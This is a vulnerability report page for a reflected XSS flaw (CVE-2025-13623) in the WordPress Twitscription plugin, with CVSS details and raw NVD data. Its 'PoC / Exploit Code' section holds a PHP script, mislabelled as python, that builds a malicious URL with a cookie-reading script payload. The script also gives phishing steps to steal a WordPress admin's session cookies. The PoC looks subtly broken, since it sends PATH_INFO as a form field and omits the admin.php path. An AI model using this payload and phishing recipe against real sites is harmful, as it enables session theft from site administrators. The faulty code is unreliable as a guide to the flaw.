Security Vulnerability Report
中文
CVE-2025-13623 CVSS 6.1 MEDIUM

CVE-2025-13623

Published: 2025-12-05 06:16:08
Last Modified: 2026-04-15 00:35:42

Description

The Twitscription plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the admin.php PATH_INFO in all versions up to, and including, 0.1.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Twitscription插件 <= 0.1.1(所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php // CVE-2025-13623 PoC - Twitscription Reflected XSS // Target: WordPress Twitscription Plugin < = 0.1.1 $target = "http://target-site.com/wp-admin/admin.php"; // Malicious XSS payload in PATH_INFO $xss_payload = "<script>alert(document.cookie)</script>"; // Construct malicious URL with XSS in PATH_INFO $malicious_url = $target . "/" . urlencode($xss_payload) . "?page=twitscription"; echo "Target URL: " . $target . "\n"; echo "Malicious URL: " . $malicious_url . "\n"; echo "\nAttack Steps:\n"; echo "1. Craft a phishing email with the malicious URL\n"; echo "2. Trick WordPress admin into clicking the link\n"; echo "3. XSS payload executes in admin's browser\n"; echo "4. Attacker steals session cookies\n"; // HTML form for demonstration $html_form = <<<HTML <html> <body> <h3>CVE-2025-13623 Exploitation Form</h3> <form action="{$target}/" method="GET"> <input type="hidden" name="page" value="twitscription"> <input type="hidden" name="PATH_INFO" value="{$xss_payload}"> <button type="submit">Click Me</button> </form> </body> </html> HTML; echo "\n" . $html_form; ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13623", "sourceIdentifier": "[email protected]", "published": "2025-12-05T06:16:08.400", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Twitscription plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the admin.php PATH_INFO in all versions up to, and including, 0.1.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/twitscription/tags/0.1.1/twitscription.php#L101", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/twitscription/trunk/twitscription.php#L101", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/twitscription/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8f6e7756-d8cc-4380-a93e-47d7916a5f7b?source=cve", "source": "[email protected]"}]}}